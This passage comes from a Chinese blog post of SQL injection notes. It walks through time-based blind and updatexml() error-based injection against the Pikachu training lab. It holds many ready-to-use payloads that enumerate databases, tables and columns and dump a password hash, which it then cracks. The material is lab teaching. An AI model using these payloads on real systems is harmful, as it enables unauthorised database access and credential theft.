<p>以此类推爆破得到用户名为：<code>admin</code>，修改<code>username</code>为<code>password</code>继续爆破得到密码为：<code>e10adc3949ba59abbe56e057f20f883e</code></p>
</li>
<li><p><strong>尝试爆破MD5</strong>:</p>
<p>使用<a href="https://cmd5.com/" target="_blank" rel="noopener">在线md5</a>爆破得到<code>admin</code>用户密码为：<code>123456</code></p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-爆破得到admin用户密码.png" alt="union注入-爆破得到admin用户密码"></center>
</li>
<li><p><strong>尝试使用爆破的账号和密码登录后台</strong>：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-union爆破登录后台.png" alt="union注入-union爆破登录后台"></center>



</li>
</ol>
<h1 id="Time注入"><a href="#Time注入" class="headerlink" title="Time注入"></a>Time注入</h1><p>​    在某些地方进行<code>boolean</code>盲注失败后，可以使用基于时间的盲注继续进行注入点测试。基于时间的注入会使用到<code>sleep()</code>函数。</p>
<p>​        在pikachu中的基于时间盲注模块使用payload：<code>vince&#39; and sleep(10)#</code>，进行检测结果如下所示。</p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/基于时间的注入操作.png">

<ol>
<li><p><strong>爆数据库名称</strong></p>
<p>输入：<code>vince&#39; and if(substr(database(),1,1)=&#39;p&#39;,sleep(10),null)#</code>，反馈结果如下所示。</p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/基于时间盲注爆数据库名称.png">

<p><strong>解析</strong>：</p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/基于时间盲注解析.png">

<p>拼接的SQL语句为：</p>
<pre class=" language-mysql"><code class="language-mysql"># 检测注入点是否存在
select id,email from member where username='vince' and sleep(5)#'
# 爆数据库名称
select id,email from member where username='vince' and if(substr(database(),1,1)='p',sleep(5),null)#'</code></pre>
<p>以此类推继续爆破得到数据库名为：<code>pikachu</code>，接下来继续爆破数据库中的表名。</p>
</li>
<li><p><strong>爆数据表名称</strong></p>
<p>由以上操作得到数据库名称<code>pikachu</code>后，还要继续使用<code>if</code>判断语句结合<code>substr()</code>和<code>ascii()</code>/<code>ord()</code>函数以及<code>union select</code>来爆数据表的名称信息。可构造payload如下：</p>
<pre class=" language-mysql"><code class="language-mysql"># 直接匹配字符
vince' and if(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1)='p',sleep(5),null)#

# 匹配字符的ASCII
vince' and if(ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=112,sleep(5),null)#
vince' and if(ord(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=112,sleep(5),null)#</code></pre>
<p>操作结果如下图所示：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/Time注入-爆httpinfo表名1.png" alt="Time注入-爆httpinfo表名1"></center>

<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/Time注入-爆httpinfo表名2.png" alt="Time注入-爆httpinfo表名2"></center>

<p>以此类推爆破得到表名为：<code>httpinfo</code>，不是我们想要的数据表，因此需要修改<code>limit</code>参数继续爆破表名。最后在<code>limit 3 1</code>处爆破得到<code>users</code>表。</p>
</li>
<li><p><strong>爆users表字段名称</strong></p>
<p>由以上操作得到数据表名称<code>users</code>后，还要继续使用<code>if</code>判断语句结合<code>substr()</code>和<code>ascii()</code>/<code>ord()</code>函数以及<code>union select</code>来爆<code>users</code>的字段名称。可构造payload如下：</p>
<pre class=" language-mysql"><code class="language-mysql"># 直接匹配字符
vince' and if(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),1,1)='p',sleep(5),null)#

# 匹配字符的ASCII
vince' and if(ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),1,1))=112,sleep(5),null)#
vince' and if(ord(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),1,1))=112,sleep(5),null)#</code></pre>
<p>操作结果如下图所示：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/Time注入-爆字段名称失败.png" alt="Time注入-爆字段名称失败"></center>

<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/Time注入-爆字段名称成功.png" alt="Time注入-爆字段名称成功"></center>

<p>以此类推爆破得到字段名为：<code>id</code>，不是我们在意的数据，因此需要修改<code>limit</code>参数继续爆破字段名。最后在<code>limit 1 1</code>处爆破得到<code>username</code>字段名，在<code>limit 2 1</code>处爆破得到<code>password</code>字段名。</p>
</li>
<li><p><strong>爆users表字段值</strong></p>
<p>由以上操作得知<code>users</code>表存在<code>username</code>和<code>password</code>字段后，还要继续使用<code>if</code>判断语句结合<code>substr()</code>和<code>ascii()</code>/<code>ord()</code>函数以及<code>union select</code>来爆<code>users</code>的字段名称。可构造payload如下：</p>
<pre class=" language-mysql"><code class="language-mysql"># 直接匹配字符
vince' and if(substr((select username from users limit 0,1),1,1)='p',sleep(5),null)#

# 匹配字符的ASCII
vince' and if(ascii(substr((select username from users limit 0,1),1,1))=112,sleep(5),null)#
vince' and if(ord(substr((select username from users limit 0,1),1,1))=112,sleep(5),null)#</code></pre>
<p>操作结果如下图所示：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/Time注入-爆字段值失败.png" alt="Time注入-爆字段值失败"></center>

<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/Time注入-爆字段值成功.png" alt="Time注入-爆字段值成功"></center>

<p>以此类推爆破得到用户名为：<code>admin</code>，修改<code>username</code>为<code>password</code>继续爆破得到密码为：<code>e10adc3949ba59abbe56e057f20f883e</code></p>
</li>
<li><p><strong>尝试爆破MD5</strong>:</p>
<p>使用<a href="https://cmd5.com/" target="_blank" rel="noopener">在线md5</a>爆破得到<code>admin</code>用户密码为：<code>123456</code></p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-爆破得到admin用户密码.png" alt="union注入-爆破得到admin用户密码"></center>
</li>
<li><p><strong>尝试使用爆破的账号和密码登录后台</strong>：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-union爆破登录后台.png" alt="union注入-union爆破登录后台"></center>



</li>
</ol>
<h1 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h1><h2 id="技巧思路"><a href="#技巧思路" class="headerlink" title="技巧思路"></a>技巧思路</h2><p>​        在MySQL中使用一些指定的函数来制造报错，从而从报错信息中获取设定的信息，常见的<code>select/insert/update/delete</code>注入都可以使用报错方式来获取信息。</p>
<h2 id="背景条件"><a href="#背景条件" class="headerlink" title="背景条件"></a>背景条件</h2><p>​        后台没有屏蔽数据库报错信息，在语法发生错误时会输出在前端。</p>
<h2 id="三个常用的用来报错的函数"><a href="#三个常用的用来报错的函数" class="headerlink" title="三个常用的用来报错的函数"></a>三个常用的用来报错的函数</h2><ul>
<li><code>updatexml()</code>：函数是MySQL对XML文档数据进行查询和修改的XPATH函数。</li>
<li><code>extractvalue()</code>：函数也是MySQL对XML文档函数进行查询和修改的XPATH函数。</li>
<li><code>floor()</code>：是MySQL中用来取整的函数。</li>
</ul>
<h2 id="基于报错的信息获取"><a href="#基于报错的信息获取" class="headerlink" title="基于报错的信息获取"></a>基于报错的信息获取</h2><p><code>updatexml(XML_document,XPath_string,new_value)</code>;</p>
<ul>
<li><code>XML_document</code>是<code>String</code>格式，为XML文档对象的名称。</li>
<li><code>XPath_string</code>XPath格式的字符串。</li>
<li><code>new_value</code>String格式，替换查找到的符合条件的数据。</li>
</ul>
<h2 id="实战测试"><a href="#实战测试" class="headerlink" title="实战测试"></a>实战测试</h2><p><strong>环境</strong>：piakchu搜索型注入</p>
<ol>
<li><p>使用<code>updatexml()</code>爆数据库版本信息</p>
<ul>
<li>输入：<code>x&#39; and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#</code>，反馈如下图所示。</li>
</ul>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/updatexml报错注入获取数据库版本信息.png">

<ul>
<li>payload：<code>x&#39; and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#</code><ul>
<li>x:任意值</li>
</ul>
</li>
</ul>
</li>
</ol>
<ol start="2">
<li><p>使用<code>updatexml()</code>爆数据库当前用户</p>
<ul>
<li>输入：<code>x&#39; and updatexml(1,concat(0x7e,(select user()),0x7e),1)#</code>，反馈如下图所示。</li>
</ul>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/updatexml报错注入获取数据库当前用户信息.png">

<ul>
<li>payload：<code>x&#39; and updatexml(1,concat(0x7e,(select user()),0x7e),1)#</code><ul>
<li>x:任意值</li>
</ul>
</li>
</ul>
</li>
</ol>
<ol start="3">
<li><p>使用<code>updatexml()</code>爆数据库名称</p>
<ul>
<li>输入：<code>x&#39; and updatexml(1,concat(0x7e,(select database()),0x7e),1)#</code>，反馈如下图所示。</li>
</ul>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/updatexml报错注入获取当前数据库名称.png">

<ul>
<li>payload：<code>x&#39; and updatexml(1,concat(0x7e,(select database()),0x7e),1)#</code><ul>
<li>x:任意值</li>
</ul>
</li>
</ul>
</li>
</ol>
<ol start="4">
<li><p>使用<code>updatexml()</code>爆数据库中的表名</p>
<ul>
<li>输入：<code>x&#39; and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=&#39;pikachu&#39; limit 3,1),0x7e),1)#</code>，反馈如下图所示。</li>
</ul>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/updatexml报错注入获取数据表名称.png">

<ul>
<li>payload：<code>x&#39; and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=&#39;pikachu&#39; limit 3,1),0x7e),1)#</code><ul>
<li>x:任意值</li>
<li>3:取第四行数据</li>
</ul>
</li>
</ul>
</li>
</ol>
<ol start="5">
<li><p>使用<code>updatexml()</code>爆数据表中的字段名</p>
<ul>
<li>输入：<code>x&#39; and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=&#39;users&#39; limit 2,1),0x7e),1)#</code>，反馈如下图所示。</li>
</ul>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/updatexml报错注入获取数据表中的字段名.png">

<ul>
<li>payload：<code>x&#39; and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=&#39;users&#39; limit 2,1),0x7e),1)#</code><ul>
<li>x:任意值</li>
<li>2:取第三行数据</li>
</ul>
</li>
</ul>
</li>
</ol>
<ol start="6">
<li><p>使用<code>updatexml()</code>爆数据表中的字段值</p>
<ul>
<li>输入：<code>x&#39; and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)#</code>，反馈如下图所示。</li>
</ul>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/updatexml报错注入获取数据表中的字段值.png">

<ul>
<li><p>payload：<code>x&#39; and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)#</code></p>
<ul>
<li>x:任意值</li>
</ul>
</li>
<li><p>但此payload不能完整地将超过31位的字段值展示出来，需要做以下改进。</p>
</li>
<li><p>输入：<code>x&#39; and updatexml(1,concat(0x7e,substring((select password from users limit 0,1),1,16),0x7e),1)#</code>，先获取password字段值的前16位。</p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/updatexml报错注入获取password字段值前16位.png">
</li>
<li><p>输入：<code>x&#39; and updatexml(1,concat(0x7e,substring((select password from users limit 0,1),17,16),0x7e),1)#</code>，再获取password字段值的后16位。</p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/updatexml报错注入获取password字段值后16位.png">
</li>
<li><p>拼接起来的password字段值为：<code>e10adc3949ba59abbe56e057f20f883e</code>，爆破出来的值为：<code>123456</code>。</p>
</li>
</ul>
</li>
</ol>
<ul>
<li><p>扩展：username、password字段值同时显示</p>
<ul>
<li><p>输入：<code>x&#39; and updatexml(0x7e,concat(0x7e,((select concat(username,0x7e,password) from users limit 0,1))),0)#</code>，反馈如下图所示。</p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/updatexml报错注入同时爆username和password字段值信息.png">
</li>
<li><p>payload：<code>x&#39; and updatexml(0x7e,concat(0x7e,((select concat(username,0x7e,password) from users limit 0,1))),0)#</code></p>
</li>
</ul>
</li>
</ul>
<p><strong>解析</strong>：</p>
<p>拼接的SQL语句为：</p>
<pre class=" language-mysql"><code class="language-mysql"># 爆数据库版本信息
select username,id,email from member where username like '%x' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#%'
# 爆当前用户信息
select username,id,email from member where username like '%x' and updatexml(1,concat(0x7e,(select user()),0x7e),1)#%'
# 爆当前数据库名称信息
select username,id,email from member where username like '%x' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#%'
# 爆数据库中表信息
select username,id,email from member where username like '%x' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),0x7e),1)#%'
# 爆数据表中字段名信息
select username,id,email from member where username like '%x' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),1)#%'
# 爆数据表中字段值信息
select username,id,email from member where username like '%x' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)#%'
# 爆password字段值前16位
select username,id,email from member where username like '%x' and updatexml(1,concat(0x7e,substring((select password from users limit 0,1),1,16),0x7e),1)#%'
# 爆password字段值后16位
select username,id,email from member where username like '%x' and updatexml(1,concat(0x7e,substring((select password from users limit 0,1),17,16),0x7e),1)#%'
# 同时爆username和password字段值
select username,id,email from member where username like '%x' and updatexml(0x7e,concat(0x7e,((select concat(username,0x7e,password) from users limit 0,1))),0)#%'</code></pre>
<h1 id="堆叠查询注入"><a href="#堆叠查询注入" class="headerlink" title="堆叠查询注入"></a>堆叠查询注入</h1><h1 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h1><h1 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h1><h1 id="Cookie注入"><a href="#Cookie注入" class="headerlink" title="Cookie注入"></a>Cookie注入</h1><h1 id="Base64注入"><a href="#Base64注入" class="headerlink" title="Base64注入"></a>Base64注入</h1><h1 id="XFF注入"><a href="#XFF注入" class="headerlink" title="XFF注入"></a>XFF注入</h1>
                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://www.z1r0s.top" rel="external nofollow noreferrer">z1r0s</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://www.z1r0s.top/2020/09/07/security/webvuln/sqli/sql-zhu-ru-bi-ji/">https://www.z1r0s.top/2020/09/07/security/webvuln/sqli/sql-zhu-ru-bi-ji/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by-nc/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY-NC 4.0</a>
                    许可协议。转载请注明来源
                    <a href="https://www.z1r0s.top" target="_blank">z1r0s</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Web漏洞/">
                                    <span class="chip bg-color">Web漏洞</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    
        <style>
    .mvaline-card {
        margin: 1.5rem auto;
    }

    .mvaline-card .card-content {
        padding: 20px 20px 5px 20px;
    }
</style>

<div class="card mvaline-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="mvcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/minivaline/MiniValine.js"></script>
<script>
    new MiniValine(Object.assign({"enable":true,"appId":"rr4jTLi2BJEgTziWjmGxpu1a-MdYXbMMI","appKey":"aFRDmu52XNOUP0PyGNjjzDCQ","mode":"DesertsP","placeholder":"Write a Comment","math":true,"md":true,"enableQQ":false,"NoRecordIP":false,"visitor":true,"maxNest":6,"pageSize":6,"adminEmailMd5":"de8a7aa53d07e6b6bceb45c64027763d","tagMeta":["管理员","小伙伴","访客"],"master":["de8a7aa53d07e6b6bceb45c64027763d"],"friends":["b5bd5d836c7a0091aa8473e79ed4c25e","adb7d1cd192658a55c0ad22a3309cecf","3ce1e6c77b4910f1871106cb30dc62b0","cfce8dc43725cc14ffcd9fb4892d5bfc"],"lang":null,"emoticonUrl":["https://cdn.jsdelivr.net/npm/alus@latest","https://cdn.jsdelivr.net/gh/MiniValine/qq@latest","https://cdn.jsdelivr.net/gh/MiniValine/Bilibilis@latest","https://cdn.jsdelivr.net/gh/MiniValine/tieba@latest","https://cdn.jsdelivr.net/gh/MiniValine/twemoji@latest","https://cdn.jsdelivr.net/gh/MiniValine/weibo@latest"]}, {
	  el: '#mvcomments',
    }));
</script>

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2020/09/07/windows/servers/ftp-fu-wu-qi-da-jian-iis/">
                    <div class="card-image">
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="FTP服务器搭建（IIS）">
                        
                        <span class="card-title">FTP服务器搭建（IIS）</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-09-07
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/软件使用/" class="post-category">
                                    软件使用
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/网络服务/">
                        <span class="chip bg-color">网络服务</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2020/09/05/debug/jie-jue-burpsuite-response-zhong-wen-luan-ma/">
                    <div class="card-image">
                        
                        <img src="/medias/featureimages/5.jpg" class="responsive-img" alt="解决BurpSuite Response中文乱码">
                        
                        <span class="card-title">解决BurpSuite Response中文乱码</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-09-05
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Debug/" class="post-category">
                                    Debug
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/BurpSuite/">
                        <span class="chip bg-color">BurpSuite</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>


<script src="https://cdn.bootcss.com/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script>
    MathJax.Hub.Config({
        tex2jax: {inlineMath: [['$', '$'], ['\(', '\)']]}
    });
</script>



    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="tencent"
                   type="playlist"
                   id="7173532278"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2020-2021</span>
            
            <span id="year">2020</span>
            <a href="/about" target="_blank">z1r0s</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">296.8k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/z1r0s" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:2603350388@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2603350388" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2603350388" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
